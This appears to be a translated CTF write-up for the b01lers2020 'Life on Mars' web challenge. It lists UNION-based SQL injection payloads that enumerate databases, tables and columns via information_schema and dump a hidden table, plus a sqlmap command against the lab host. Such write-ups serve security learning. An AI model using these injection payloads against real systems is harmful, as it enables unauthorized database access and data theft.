当前位置:网站首页>[b01lers2020]Life on Mars
[b01lers2020]Life on Mars
2022-08-03 22:03:00 【New Reading of the Classic of Tea.】
[b01lers2020]Life on Mars

A general look at the points is not important, f12 found nothing, and the packet capture found GET /query?search=&amazonis_planitia&{}&_=1659321817406
strong>, click on different titles, the content of amazonis_planitia will also change with it

Attempt to enter the page it appears on this page
![]()

Find a lot of data, try union query: /query?search=amazonis_planitia union select 1,2, find that there areecho

Check the library: /query?search=amazonis_planitia union select version(),database()

Check the table: /query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='aliens'

After checking, I found that the echoed things are the titles of the first page, query the fields of the table: /query?search=amazonis_planitia union select1,group_concat(column_name) from information_schema.columns where table_name='amazonis_planitia', nothing special 
Use the sqlmap tool to scan it
sqlmap download: sqlmap: automatic SQL injection and database takeover tool
python2 sqlmap.py -u http://xxxxxxxx.node4.buuoj.cn:81/query?search=amazonis_planitia --dbs

I found that there are three databases in the modified webpage, and you can check it yourself: /query?search=amazonis_planitia union select 1,group_concat(schema_name) from information_schema.SCHEMATA, there are indeed three databases

I have already queried aliens and found nothing, continue to query the table of alien_code: /query?search=amazonis_planitia union select 1,group_concat(table_name)from information_schema.tables where table_schema='alien_code'

Query the fields of the code table: /query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name='code'

Check the content: /query?search=amazonis_planitia union select group_concat(id),group_concat(code) from alien_code.code

This is the end, let's spread the flowers
边栏推荐
- Go开发工具GoLand V2022.2 来了——Go 工作区重大升级
- mysql如何将表结构导出到excel
- AI首席架构师13-AICA-智能文档分析技术在行业场景中的应用
- B. Paranoid String
- 从0到1看支付
- Data_web(九)mongodb增量同步到mongodb
- YOLO之父宣布退出CV界,坦言无法忽视自己工作带来的负面影响
- 2022的七夕,奉上7个精美的表白代码,同时教大家快速改源码自用
- FVCOM 3D Numerical Simulation of Hydrodynamics, Water Exchange, Dispersion and Transport of Oil Spills丨FVCOM Model Watershed, Numerical Simulation Method of Marine Water Environment
- 480. Sliding Window Median
猜你喜欢
随机推荐
D - Project Planning--二分
Android build error: Plugin with id 'kotlin-android' not found.
gtk实现图片旋转
现网设备兼容SRv6网络演进
《强化学习周刊》第56期:GraphIRL、REDEEMER & 眼科强化学习的潜在研究
CAS:1620523-64-9_Azide-SS-biotin_biotin-disulfide-azide
4. Modular programming
线上服务器老是卡,该如何优化?
CAS: 773888-45-2_BIOTIN ALKYNE_Biotin-alkynyl
E-commerce data warehouse ODS layer-----log data loading
CAS: 773888-45-2_BIOTIN ALKYNE_生物素-炔基
LVS负载均衡集群
CAS:122567-66-2_DSPE-生物素_DSPE-Biotin
如何设计 DAO 的 PoW 评判标准 并平衡不可能三角
STP生成树
一文带你了解软件测试是干什么的?薪资高不高?0基础怎么学?
376. Wiggle Subsequence
488. Zuma Game
数据一致性:双删为什么要延时?
2022年全国职业院校技能大赛网络安全 B模块 B-1任务一:主机发现与信息收集 国赛原题









